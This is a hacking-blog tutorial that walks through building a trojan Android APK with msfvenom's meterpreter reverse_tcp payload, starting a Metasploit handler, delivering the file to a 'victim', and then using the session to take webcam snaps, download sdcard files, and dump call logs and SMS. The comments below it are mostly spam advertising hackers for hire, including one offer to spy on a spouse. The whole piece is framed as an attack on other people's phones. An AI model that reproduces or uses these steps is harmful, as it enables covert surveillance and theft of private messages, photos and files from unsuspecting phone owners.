Greeting people ,
BL4CK|PHOENIX squad , presenting a way to hack android phone's over wide area network(internet) remotely with metasploit . I know lot's people know about this already but then also i have written this tutorial for new borns . So before starting let me explain how it work's in short so you'll get idea what's going on with this method.
so, what actually happen's the hacker make's a torjan backdoor.apk file to gain access to the victim's android phone. once , the victim install the trojan file in his android phone it take's control to the internal activities of phone and hacker's get sessions and take's control .
So if you want to play the role of a Hacker
Follow the steps(don't type # in commands) -
-->> Fire-up Kali linux
--> Start metasploit and postgresql services by typing the following comand in terminal
and hit enter
--> # service metasploit start && service postgresql start
--> Open port 4444 or any other from your router (note your linux firewall is not blocking that port)
--> Check your port is on or not type the following command in terminal to check and hit enter
--> # nc -lvp 4444
--> if it's listening got to http://www.yougetsignal.com/tools/open-ports/ type the following port and hit check button if it's on move forward to next step
-->> Make a payload listener (trojan backdoor.apk)
--> type the following command in the terminal and hit enter
--> # msfvenom -p android/meterpreter/reverse_tcp LHOST=(yourexternalip) LPORT=4444 R > name.apk
NOTE the Apk is in root folder
--> Open msfconsole by typing # msfconsole in new terminal and hit enter
--> Now type the following commands and hit enter -
--> # use multi/handler
--> # set payload android/meterpreter/reverse_tcp
--> # set lhost (yourinternalip)
--> # set lport 4444
--> Run the handler by the command following commands run/exploit
--> # exploit or # run
--> Send this Apk file to victim via any file hosting sites eg - http://www.zippyshare.com
--> When victim install and open the apk we'll get meterpreter sessions(ready to exploit)
--> To access the camera front and rear type the following command respectively
--> to take a snap # webcam_snap
--> to stream # webcam_stream
--> To sneak in memory type the following command and hit enter
--> # cd ..
--> to go in sdcard
--> # cd /sdcard
to list the files
--> # ls
--> To download any file
--> # download (filename)
--> To steal call logs and sms type the following command
--> # dump_calllog
--> # dump_sms
|EXPECT THE PHOENIX|
-Bit'z Ap'urv
WATCH VIDEO TUTORIAL
i really love the tutorial...i had a request can u make a tut of stagefright tooo i got the execution file but do no how to use it...its like having a key to bank and dono how to use it i am getting mad ...plz bro make a tut on stagefright execution all the tut i found are like an half boiled egg...they aren't showing only making part not the execution part....thank you
ReplyDeleteIF for the same android i want to see again next day then do i have to follow the process all again.
ReplyDeleteListed here you'll learn it is important, them offers the link in an helpful webpage: how to hack a phone
ReplyDeleteIf you need a service of an hacker to hack all social media account then
ReplyDeletehttps://Social media hacker for hire/
Try this using the Best tip using to spy a phone
ReplyDeleteHack a android phone using
ReplyDeletegenuine hacker for hire
https://Trusted hacker for hire/
ReplyDeletehttps://Private investigator for hire service online/
ReplyDeleteHire a hacker for phone hacking
ReplyDeletehttps://hackactivities.com/
Cell phone hacking (whatsapp, viber, line, wechat, etc)
ReplyDelete- Websites hacking, pentesting.
- IP addresses and people tracking.
hire a hacker online
ReplyDeleteLet hire a professional hacker for cell phone service
ReplyDeleteusing cell phone monitor to change grades find out
ReplyDeletehire a hacker for whatsapp to spy on your spouse without being caught
ReplyDelete